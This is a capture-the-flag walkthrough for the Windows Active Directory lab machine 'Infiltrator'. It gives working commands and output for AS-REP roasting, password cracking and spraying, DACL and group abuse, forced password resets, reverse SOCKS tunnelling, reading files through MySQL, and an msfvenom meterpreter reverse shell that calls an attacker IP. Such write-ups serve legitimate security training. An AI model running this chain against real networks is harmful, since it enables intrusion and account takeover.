Infiltrator

OS: Windows
Difficulty: Insane
Points: 50

Nmap

nmap -v -p- --min-rate=5000 10.129.102.127
nmap -v -p 53,80,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,15220,15230,49667,49690,49691,49696,49729,49753,50222 -sV -sC -oN nmap.txt 10.129.26.202
Nmap scan report for infiltrator.htb (10.129.26.202)
Host is up (0.026s latency).

PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Simple DNS Plus
80/tcp    open     http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Infiltrator.htb
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-04 08:40:46Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-04T08:45:08+00:00; +1s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Issuer: commonName=infiltrator-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-04T18:48:15
| Not valid after:  2099-07-17T18:48:15
| MD5:   edac:cc15:9e17:55f8:349b:2018:9d73:486b
|_SHA-1: abfd:2798:30ac:7b08:de25:677b:654b:b704:7d01:f071
445/tcp   open     microsoft-ds?
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-04T08:45:08+00:00; +1s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Issuer: commonName=infiltrator-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-04T18:48:15
| Not valid after:  2099-07-17T18:48:15
| MD5:   edac:cc15:9e17:55f8:349b:2018:9d73:486b
|_SHA-1: abfd:2798:30ac:7b08:de25:677b:654b:b704:7d01:f071
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-04T08:45:08+00:00; +1s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Issuer: commonName=infiltrator-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-04T18:48:15
| Not valid after:  2099-07-17T18:48:15
| MD5:   edac:cc15:9e17:55f8:349b:2018:9d73:486b
|_SHA-1: abfd:2798:30ac:7b08:de25:677b:654b:b704:7d01:f071
3269/tcp  open     ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Issuer: commonName=infiltrator-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-04T18:48:15
| Not valid after:  2099-07-17T18:48:15
| MD5:   edac:cc15:9e17:55f8:349b:2018:9d73:486b
|_SHA-1: abfd:2798:30ac:7b08:de25:677b:654b:b704:7d01:f071
|_ssl-date: 2024-09-04T08:45:08+00:00; +1s from scanner time.
3389/tcp  open     ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-09-04T08:45:08+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=dc01.infiltrator.htb
| Issuer: commonName=dc01.infiltrator.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-07-30T13:20:17
| Not valid after:  2025-01-29T13:20:17
| MD5:   be1d:a071:bf6d:fff0:20c0:6b23:8e7e:1763
|_SHA-1: cbda:6e22:6ccf:b5e7:534c:b9f0:d9e7:c5d8:dab9:769e
| rdp-ntlm-info: 
|   Target_Name: INFILTRATOR
|   NetBIOS_Domain_Name: INFILTRATOR
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: infiltrator.htb
|   DNS_Computer_Name: dc01.infiltrator.htb
|   DNS_Tree_Name: infiltrator.htb
|   Product_Version: 10.0.17763
|_  System_Time: 2024-09-04T08:44:28+00:00
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open     mc-nmf        .NET Message Framing
15220/tcp open     unknown
15230/tcp open     unknown
49667/tcp open     msrpc         Microsoft Windows RPC
49690/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
49691/tcp open     msrpc         Microsoft Windows RPC
49696/tcp open     msrpc         Microsoft Windows RPC
49729/tcp open     msrpc         Microsoft Windows RPC
49753/tcp filtered unknown
50222/tcp filtered unknown
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Enumeration

On the website on port 80 we find employee names, and from them we build a user list in the traditional corporate account format (first initial, dot, last name).

d.anderson
o.martinez
k.turner
a.walker
m.harris
l.clark
e.rodriguez

ASREPRoast Enum

We find one user that does not require Kerberos pre-authentication (UF_DONT_REQUIRE_PREAUTH set), so GetNPUsers returns its AS-REP hash.

┌──(root㉿kali)-[~/Infiltrator]
└─# impacket-GetNPUsers -usersfile users.txt infiltrator.htb/ -dc-ip 10.129.102.127
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] User d.anderson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User o.martinez doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User k.turner doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a.walker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User m.harris doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$l.clark@INFILTRATOR.HTB:3ee88385554cdb631bdbb2206dac381e$38834280155c9eec216b4ac65caf1bfe5ccd2f9f50ce80f371410ea7b3945df900c320aa4842e389847966446082550cdea932319c1194f7e710632cfe7d043b3e9bd657190c38eb0c8ee59f9581b6c16a9b4d7f6a1e1919f59c125982bcc9107107c94d59e5d0f77f848b7dbf4100b6c880fe8b565b64fb9e4eb22eb82cef03aa36a9339b2efbff5f077142e3f2a9632d1c79d778bbe3196f6f6276412303720d4439e39574ea6285fa1472d7c43c0eb18f5161b2ce6d33b1ce5ba80ca0b2ffa3ccf31e1969e6ae8cd7587b808028cd5d67684e91d1495b2a10a621adab0b04698b5427d441a8b4087d61ef921fbe8fe261
[-] User e.rodriguez doesn't have UF_DONT_REQUIRE_PREAUTH set
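The output above is easy to misread when the user list is long. The following is an added example, not part of this write-up or of Impacket: it parses GetNPUsers-style lines (the sample is constructed, with a placeholder hash) into roastable and protected accounts, names the encryption type of each hash, and exposes the userAccountControl bit check so the same test can be run against an LDAP export.

```python
import re

# userAccountControl bit that disables Kerberos pre-authentication.
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Kerberos encryption types seen in AS-REP hashes (23 is RC4, the weakest).
ETYPE_NAMES = {17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96", 23: "rc4-hmac"}

# "[-] User <name> doesn't have UF_DONT_REQUIRE_PREAUTH set"
NOT_ROASTABLE = re.compile(r"^\[-\] User (\S+) doesn't have UF_DONT_REQUIRE_PREAUTH set")
# "$krb5asrep$<etype>$<user>@<REALM>:<checksum>$<ciphertext>"
ASREP_HASH = re.compile(r"^\$krb5asrep\$(\d+)\$([^@$]+)@([^:]+):([0-9a-f]+)\$([0-9a-f]+)$")


def preauth_disabled(user_account_control: int) -> bool:
    """True when the account's UAC flags disable pre-authentication."""
    return bool(user_account_control & UF_DONT_REQUIRE_PREAUTH)


def triage_getnpusers(output: str) -> dict:
    """Map GetNPUsers output to {"roastable": {user: etype_name}, "protected": [user]}."""
    roastable, protected = {}, []
    for raw in output.splitlines():
        line = raw.strip()
        m = NOT_ROASTABLE.match(line)
        if m:
            protected.append(m.group(1))
            continue
        m = ASREP_HASH.match(line)
        if m:
            etype = int(m.group(1))
            roastable[m.group(2)] = ETYPE_NAMES.get(etype, f"etype-{etype}")
    return {"roastable": roastable, "protected": protected}


# Constructed sample in the tool's format: same accounts as above, placeholder hash.
SAMPLE_OUTPUT = """\
[-] User d.anderson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User o.martinez doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$l.clark@INFILTRATOR.HTB:0123456789abcdef0123456789abcdef$00112233445566778899aabbccddeeff
[-] User e.rodriguez doesn't have UF_DONT_REQUIRE_PREAUTH set
"""

if __name__ == "__main__":
    print(triage_getnpusers(SAMPLE_OUTPUT))
```

An etype of 23 in the returned hash means the KDC still issues RC4-encrypted AS-REPs for that account, which is the cheapest case to crack offline.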

We recover the password with john.

┌──(root㉿kali)-[~/Infiltrator]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 ASIMD 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
WAT?watismypass! ($krb5asrep$23$l.clark@INFILTRATOR.HTB)     
1g 0:00:00:05 DONE (2024-09-04 04:23) 0.1730g/s 1817Kp/s 1817Kc/s 1817KC/s WEQ6897..W0rthless.1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

We use bloodhound-python to enumerate the LDAP service.

https://github.com/dirkjanm/BloodHound.py

┌──(root㉿kali)-[~/Infiltrator]
└─# bloodhound-python -u l.clark -p 'WAT?watismypass!' -c ALL -d infiltrator.htb -dc dc01.infiltrator.htb --dns-tcp -ns 10.129.26.202
INFO: Found AD domain: infiltrator.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.infiltrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.infiltrator.htb
INFO: Found 14 users
INFO: Found 58 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.infiltrator.htb

Bloodhound Enumeration

The users l.clark and d.anderson belong to the marketing_team group.

We see that d.anderson has GenericAll over the Marketing Digital group.

Having full control over it, we can manipulate its descendant objects, in this case the user e.rodriguez.

TGT Ticket

Reusing the password with crackmapexec against the user list, two accounts return STATUS_ACCOUNT_RESTRICTION, which means the password is also valid for them but a logon restriction applies.

┌──(root㉿kali)-[~/Infiltrator]
└─# crackmapexec smb 10.129.26.202 -u users.txt -p 'WAT?watismypass!'
SMB         10.129.26.202   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
SMB         10.129.26.202   445    DC01             [-] infiltrator.htb\infiltrator_svc:WAT?watismypass! STATUS_LOGON_FAILURE 
SMB         10.129.26.202   445    DC01             [-] infiltrator.htb\d.anderson:WAT?watismypass! STATUS_ACCOUNT_RESTRICTION 
SMB         10.129.26.202   445    DC01             [-] infiltrator.htb\o.martinez:WAT?watismypass! STATUS_LOGON_FAILURE 
SMB         10.129.26.202   445    DC01             [-] infiltrator.htb\k.turner:WAT?watismypass! STATUS_LOGON_FAILURE 
SMB         10.129.26.202   445    DC01             [-] infiltrator.htb\a.walker:WAT?watismypass! STATUS_LOGON_FAILURE 
SMB         10.129.26.202   445    DC01             [-] infiltrator.htb\m.harris:WAT?watismypass! STATUS_ACCOUNT_RESTRICTION 
SMB         10.129.26.202   445    DC01             [+] infiltrator.htb\l.clark:WAT?watismypass!
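The distinction drawn from the output above (wrong password versus valid password with a restricted logon) is the useful part of a spray result, so here is an added example, not part of this write-up or of CrackMapExec, that classifies result lines in that format. The sample lines are constructed with a placeholder IP and password, and the parser assumes passwords without whitespace.

```python
import re

# One result line per account; the "[*]" banner line is ignored because it
# carries neither "[+]" nor "[-]". Assumes passwords without whitespace.
RESULT = re.compile(
    r"^SMB\s+\S+\s+\d+\s+\S+\s+\[([+-])\]\s+([^\\]+)\\([^:]+):(\S+)\s*(\S*)"
)

# NT status values that the DC only returns after the password was accepted.
VALID_PASSWORD_STATUSES = {
    "STATUS_ACCOUNT_RESTRICTION",   # logon hours / workstation / policy block
    "STATUS_PASSWORD_MUST_CHANGE",
    "STATUS_PASSWORD_EXPIRED",
}


def classify_spray(output: str) -> dict:
    """Bucket accounts by what the result reveals about the tested password."""
    buckets = {"valid": [], "valid_but_restricted": [], "invalid": []}
    for raw in output.splitlines():
        m = RESULT.match(raw.strip())
        if not m:
            continue
        mark, _domain, user, _password, status = m.groups()
        if mark == "+":
            buckets["valid"].append(user)
        elif status in VALID_PASSWORD_STATUSES:
            buckets["valid_but_restricted"].append(user)
        else:
            buckets["invalid"].append(user)
    return buckets


# Constructed sample lines in the crackmapexec format (placeholder IP/password).
SAMPLE = """\
SMB  10.0.0.1  445  DC01  [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
SMB  10.0.0.1  445  DC01  [-] infiltrator.htb\\infiltrator_svc:Placeholder-pw1 STATUS_LOGON_FAILURE
SMB  10.0.0.1  445  DC01  [-] infiltrator.htb\\d.anderson:Placeholder-pw1 STATUS_ACCOUNT_RESTRICTION
SMB  10.0.0.1  445  DC01  [-] infiltrator.htb\\m.harris:Placeholder-pw1 STATUS_ACCOUNT_RESTRICTION
SMB  10.0.0.1  445  DC01  [+] infiltrator.htb\\l.clark:Placeholder-pw1
"""

if __name__ == "__main__":
    for bucket, users in classify_spray(SAMPLE).items():
        print(f"{bucket}: {', '.join(users) or '-'}")
```

Accounts in the valid_but_restricted bucket are the ones worth investigating for password reuse, since the restriction only blocks this logon type, not the credential itself.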

It is possible to obtain a TGT with the d.anderson account (after syncing the clock with the DC).

ntpdate -s 10.129.26.202
┌──(root㉿kali)-[~/Infiltrator]
└─# impacket-getTGT infiltrator.htb/d.anderson:'WAT?watismypass!'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Saving ticket in d.anderson.ccache
export KRB5CCNAME=d.anderson.ccache

Generic All - Group Add Full Control

We follow the instructions from BloodHound, or from the link below, to take control of the group.

https://www.thehacker.recipes/ad/movement/dacl/grant-rights

┌──(root㉿kali)-[~/Infiltrator]
└─# python3 /opt/impacket/examples/dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb/d.anderson' -k -no-pass -dc-ip 10.10.11.31
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20240904-091845.bak
[*] DACL modified successfully!

AddSelf - Group Lateral Movement

We see that the user e.rodriguez can add himself to the CHIEFS MARKETING group.

Using the bloodyAD tool we do the following.

https://github.com/CravateRouge/bloodyAD

First we change the user's password, authenticating with the d.anderson ticket.

┌──(root㉿kali)-[~/Infiltrator]
└─# python3 /opt/bloodyAD/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" -k set password "e.rodriguez" 'D00msl4y3r!'
[+] Password changed successfully!

We add ourselves to the group.

┌──(root㉿kali)-[~/Infiltrator]
└─# python3 /opt/bloodyAD/bloodyAD.py --host dc01.infiltrator.htb -d infiltrator.htb -u e.rodriguez -p 'D00msl4y3r!' add groupMember "CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB" e.rodriguez
[+] e.rodriguez added to CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB

ForceChangePassword - User Lateral Movement

Now we see that we can change the password of the user m.harris.

We do the following.

┌──(root㉿kali)-[~/Infiltrator]
└─# python3 /opt/bloodyAD/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" -u e.rodriguez -p 'D00msl4y3r!' set password "m.harris" 'D00msl4y3r!'
[+] Password changed successfully!

Evil-winrm Kerberos

This user can connect remotely since it belongs to the Remote Management Users group.

It is not possible to log in directly with username and password, so we create a ticket.

┌──(root㉿kali)-[~/Infiltrator]
└─# impacket-getTGT infiltrator.htb/m.harris:'D00msl4y3r!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in m.harris.ccache
export KRB5CCNAME=m.harris.ccache

To connect over Kerberos we first have to configure our Kerberos client file (/etc/krb5.conf) as follows.

┌──(root㉿kali)-[~/Infiltrator]
└─# cat /etc/krb5.conf 
[libdefaults]
        default_realm = INFILTRATOR.HTB

[realms]
        INFILTRATOR.HTB = {
                kdc = DC01.INFILTRATOR.HTB
                admin_server = INFILTRATOR.HTB
        }

Once that is done, we connect with evil-winrm using the ticket.

┌──(root㉿kali)-[~/Infiltrator]
└─# evil-winrm -i DC01.INFILTRATOR.HTB -r INFILTRATOR.HTB

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\M.harris\Documents> whoami
infiltrator\m.harris
*Evil-WinRM* PS C:\Users\M.harris\Documents> type ..\Desktop\user.txt
6f71ae23774fe44dd5329cf77db99d68
*Evil-WinRM* PS C:\Users\M.harris\Documents>

Privilege Escalation

We see that there is a program called Output Messenger Server, and its directories appear in the PATH.

Checking write permissions in PATH folders (DLL Hijacking)
Check for DLL Hijacking in PATH folders https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dll-hijacking
    C:\Windows\system32
    C:\Windows
    C:\Windows\System32\Wbem
    C:\Windows\System32\WindowsPowerShell\v1.0\
    C:\Windows\System32\OpenSSH\
    C:\Program Files\Output Messenger Server\Plugins\Output\apache2\bin\
    C:\Program Files\Output Messenger Server\Plugins\Output\php\
    C:\Program Files\Output Messenger Server\Plugins\Output\mysql\bin\

The following local ports belong to that program.

  TCP        0.0.0.0               14127         0.0.0.0               0               Listening         7012            OMServerService
  TCP        0.0.0.0               14128         0.0.0.0               0               Listening         7012            OMServerService
  TCP        0.0.0.0               14130         0.0.0.0               0               Listening         7012            OMServerService
  TCP        0.0.0.0               14406         0.0.0.0               0               Listening         6864            outputmessenger_mysqld

To reach them we use chisel with proxychains (reverse SOCKS from the target to our machine).

C:\temp>chisel.exe client 10.10.14.17:5555 R:socks
chisel.exe client 10.10.14.17:5555 R:socks
2024/09/05 00:52:59 client: Connecting to ws://10.10.14.17:5555
2024/09/05 00:53:00 client: Connected (Latency 16.2323ms)
┌──(root㉿kali)-[~/Infiltrator]
└─# /opt/linux/chisel server -p 5555 --reverse
2024/09/05 03:52:44 server: Reverse tunnelling enabled
2024/09/05 03:52:44 server: Fingerprint yhgxXRYksBZxG45QLUAOD/0xgNYr14NTqaPuB73M5YQ=
2024/09/05 03:52:44 server: Listening on http://0.0.0.0:5555
2024/09/05 03:53:00 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

Unintended Path

We also find the following zip file.

cd 'C:\ProgramData\Output Messenger Server\Temp\'
download OutputMessengerMysql.zip

Once it is downloaded, the file OutputMysql.ini inside it contains database credentials.

[SETTINGS]
SQLPort=14406
Version=1.0.0

[DBCONFIG]
DBUsername=root
DBPassword=ibWijteig5
DBName=outputwall

We connect to the server through the SOCKS proxy.

proxychains mysql -h 127.0.0.1 -P 14406 --database=outputwall -uroot -pibWijteig5

Trying to read local files with LOAD_FILE, it is possible to obtain the root flag: the database account has the FILE privilege and the service runs with enough rights to read the Administrator's desktop.

MariaDB [outputwall]> SELECT LOAD_FILE('C:\\Users\\Administrator\\Desktop\\root.txt');
+----------------------------------------------------------+
| LOAD_FILE('C:\\Users\\Administrator\\Desktop\\root.txt') |
+----------------------------------------------------------+
| f1356b404eb13097ed65ff372aa70740                         |
+----------------------------------------------------------+

Intended Path

┌──(root㉿kali)-[~/Infiltrator]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.17 LPORT=4444 -f exe -o shell.exe 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf6 exploit(multi/handler) > run
meterpreter > run autoroute -s 10.10.11.31/16

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.10.11.31/255.255.0.0...
[+] Added route to 10.10.11.31/255.255.0.0 via 10.10.11.31
[*] Use the -p option to list all active routes
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.

[*] Starting the SOCKS proxy server
msf6 auxiliary(server/socks_proxy) >